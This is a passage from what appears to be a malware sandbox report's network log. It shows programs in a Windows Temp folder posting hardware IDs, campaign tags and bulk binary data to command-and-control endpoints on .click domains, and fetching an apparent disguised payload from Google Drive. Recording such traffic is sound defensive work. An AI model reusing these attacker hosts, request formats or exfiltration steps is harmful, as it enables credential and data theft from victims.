                                                                                                                                                                                                                                                              2024-12-22 01:16:45 UTC15331OUTData Raw: 10 50 86 46 54 37 f7 8c 63 ce ed 70 72 23 4a 2e 35 c5 5b 44 23 de c2 e2 99 96 c2 95 64 11 d2 ae f5 9b 46 da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73
                                                                                                                                                                                                                                                              Data Ascii: PFT7cpr#J.5[D#dFk|#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s
                                                                                                                                                                                                                                                              2024-12-22 01:16:49 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=51a28qmojl1hi9p4lh5v2o62f2; expires=Wed, 16 Apr 2025 19:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=putmnafQUukKRo5j45eIk8azAgF8vWqxySP7GncXPTCwrW1DCpUxTpqfVcNkIfGk90n5ccF7%2BlWoi4ekCfxehOhYyUx4x9RxgLiYTvPYN2agQRCKSIqjjJdM%2FJmglCBxJkz%2BXHbV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44b31f9243d7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1822&rtt_var=740&sent=322&recv=571&lost=0&retrans=0&sent_bytes=2848&recv_bytes=551958&delivery_rate=1602634&cwnd=208&unsent_bytes=0&cid=ffa0aae83d314013&ts=3818&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.449863104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:48 UTC368OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=71L99TJFEPMXA
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20410
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:48 UTC15331OUTData Raw: 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46 45 50 4d 58 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 37 31 4c 39 39 54 4a 46
                                                                                                                                                                                                                                                              Data Ascii: --71L99TJFEPMXAContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--71L99TJFEPMXAContent-Disposition: form-data; name="pid"3--71L99TJFEPMXAContent-Disposition: form-data; name="lid"CZJvss--geopoxid--71L99TJF
                                                                                                                                                                                                                                                              2024-12-22 01:16:48 UTC5079OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:16:49 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=qcmf07jfldfga0r1inf186upkm; expires=Wed, 16 Apr 2025 19:03:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9rdK3IqdBNThBqVbl6x%2BkJmJMeDxcvWNOnC9GTp%2B880chSuiU8lpceiM1tl%2F21%2FwhYVeAgB9O2f%2B2647pSqMR7ZdtesHB%2Fknx5ToYzqRvBw2CKgKdEclNBulOyXeR8Aml0L1d4I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44c2cc1e3300-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1954&rtt_var=778&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21458&delivery_rate=1367681&cwnd=236&unsent_bytes=0&cid=8c47e3e67e934ccf&ts=1072&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449867216.58.208.2384432212C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:50 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: FileDownloader
                                                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:51 GMT
                                                                                                                                                                                                                                                              Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-K9Rgvju2Wp-EhSZXihfWzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.449875172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:50 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 81
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:50 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=3d6vop707m78spfrh2qtn3pvub; expires=Wed, 16 Apr 2025 19:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XsRO81EN7y5TrzU%2By7GPeycZrJYEJrZm9J%2FMZrNMxpk3Z8ORsRhvsYnSwwfGX%2FaqpexSayLVPPZZtTlXnC%2BCnZHy8WAhg%2Fi%2B3ucThlSz3Tc4dvVyKnIqY%2Bh5atgPZvp3HpN2c0V7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44d42fd832ee-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=984&delivery_rate=1574123&cwnd=242&unsent_bytes=0&cid=9948423b69fe1d16&ts=874&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC54INData Raw: 33 30 0d 0a 37 6b 58 54 6e 75 4e 4c 6c 41 79 36 6b 66 52 6f 4c 39 44 6d 33 57 72 64 5a 54 46 74 77 4b 36 72 63 6b 30 67 4a 48 34 73 4e 6c 65 31 47 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 307kXTnuNLlAy6kfRoL9Dm3WrdZTFtwK6rck0gJH4sNle1GA==
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.449876104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC368OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VSPGA1UD22RELI
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1287
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC1287OUTData Raw: 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 50 47 41 31 55 44 32 32 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 56 53 50 47 41
                                                                                                                                                                                                                                                              Data Ascii: --VSPGA1UD22RELIContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--VSPGA1UD22RELIContent-Disposition: form-data; name="pid"1--VSPGA1UD22RELIContent-Disposition: form-data; name="lid"CZJvss--geopoxid--VSPGA
                                                                                                                                                                                                                                                              2024-12-22 01:16:52 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=acj8atr45hj8h70qemburt0f0t; expires=Wed, 16 Apr 2025 19:03:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxqU94tVVPNzJjVy2ldRdvab6yYjKXDhUGg203nXC5EPHVSCmQGUuseyFagKvM3W6HZbe3MaUG5Oy2PPSqWTDowoQ86TCSk8mnr4rwM6%2Bz%2FM4sH8s4uZKTz2NNHHzPvLYBtHO68%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44d5cdd24381-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2181&min_rtt=2174&rtt_var=830&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2291&delivery_rate=1307072&cwnd=211&unsent_bytes=0&cid=ce8073d2c49a0d57&ts=820&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.2.449874216.58.208.2384434628C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:51 UTC150OUTGET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: FileDownloader
                                                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:16:52 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:51 GMT
                                                                                                                                                                                                                                                              Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3tHuR5-qaEsr6W1XHR76aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.449882142.250.181.654432212C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:53 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: FileDownloader
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC4919INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC6b8vlAhRM6BhjO-qvG7XegibYD7_vuY58QsOY3NmcR6H74rTBRpJbUPZGCud5y6TkbAvfcvQc
                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 156917
                                                                                                                                                                                                                                                              Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:55 GMT
                                                                                                                                                                                                                                                              Expires: Sun, 22 Dec 2024 01:16:55 GMT
                                                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC4919INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
